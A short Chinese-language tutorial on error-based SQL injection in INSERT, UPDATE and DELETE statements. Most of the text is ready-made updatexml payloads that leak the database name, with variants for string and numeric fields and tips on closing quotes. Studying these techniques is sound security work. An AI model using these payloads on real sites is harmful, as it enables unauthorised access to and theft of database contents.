insert 注入
插入语句
insert into tables values(value1,value2,value3);
如:插入用户表
insert into users (id,name,password) values ('id','username','password');
当点击注册
先判断是否有SQL注入漏洞,经过判断之后发现存在SQL漏洞。构造insert的payload。
insert into users (id,name,password) values ('1'or updatexml(1,concat(0x7e,database()),0),'username','password');
//为了使得左右符号闭合,所以构造的输入payload 是
name' or updatexml(1,concat(0x7e,database()),0) or '
由于插入id 这里有个or 的或运算,所以会执行 updatexml 方法,实现报错注入。
同理,update 注入
update的 SQL语句
update users set passowrd='pass' ;
//构造update 注入语句:注意闭合
update users set passowrd='pass' or updatexml(1,concat(0x7e,database()),0) ;
如构造输入payload
aa' or updatexml(1,concat(0x7e,database()),0) or '
提交,获得数据库名;
基于delete 的报错注入
delete from users where username = 'username' ;
//构造delete 注入语句:注意闭合
delete from users where username = 'username' or updatexml(1,concat(0x7e,database()),0) or '' ;
//字符型
1' or updatexml(1,concat(0x7e,database()),0) or '
//数字型
1 or updatexml(1,concat(0x7e,database()),0)
得到 delete 注入结果
总结:要注意开头部分的and和or,and不行那就改用or,或者用替换符&&(and)和||(or),其次是闭合的方式不只有#和--+,还有or'